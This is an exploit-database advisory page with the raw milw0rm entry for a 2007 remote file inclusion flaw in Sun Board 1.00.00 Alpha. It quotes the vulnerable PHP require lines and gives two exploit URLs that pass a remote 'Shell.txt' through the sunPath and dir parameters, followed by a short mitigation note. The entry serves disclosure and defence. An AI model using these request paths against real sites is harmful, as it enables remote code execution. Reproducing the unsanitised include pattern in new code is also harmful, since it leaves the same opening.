header-logo
Suggest Exploit
vendor:
Sun Board
by:
GoLd_M = [Mahmood_ali]
5.5
CVSS
MEDIUM
Remote File Inclusion
98
CWE
Product Name: Sun Board
Affected Version From: 1.00.00 Alpha
Affected Version To: 1.00.00 Alpha
Patch Exists: NO
Related CWE: Not Available
CPE: Not Available
Metasploit:
Other Scripts:
Platforms Tested: Not Available
2007

Sun Board 1.00.00 Alpha Multiple Remote File Inclusion Vulnerabilities

The vulnerability allows an attacker to include remote files into the application, which can lead to remote code execution or information disclosure.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate file paths before including them in the code.
Source

Exploit-DB raw data:

# Sun Board 1.00.00 Alpha Multiple Remote File Inclusion Vulnerabilities

# D.Script :
      http://mesh.dl.sourceforge.net/sourceforge/sunboard/sunboard.zip

# V.Code :
      require $sunPath.'config.php';
      require_once $sunPath.'dbms/'.$dbtype.'.php';
# In :
      /include.php

# Exploits :
      /include.php?sunPath=Shell.txt?

# V.Code 2 :
      <?php require_once $dir.'/lib.php'; ?>

# In :
      /skin/board/default/doctype.php

# Exploits 2 :
      /skin/board/default/doctype.php?dir=Shell.txt?

# Discovered by:
      GoLd_M = [Mahmood_ali]

# Homepage:
      http://www.Tryag.Com/cc

# Sp.Thanx To :
      Tryag-Team & Asb-May's Group

# milw0rm.com [2007-06-22]

Navigation

Suggest Exploit

Services By CQR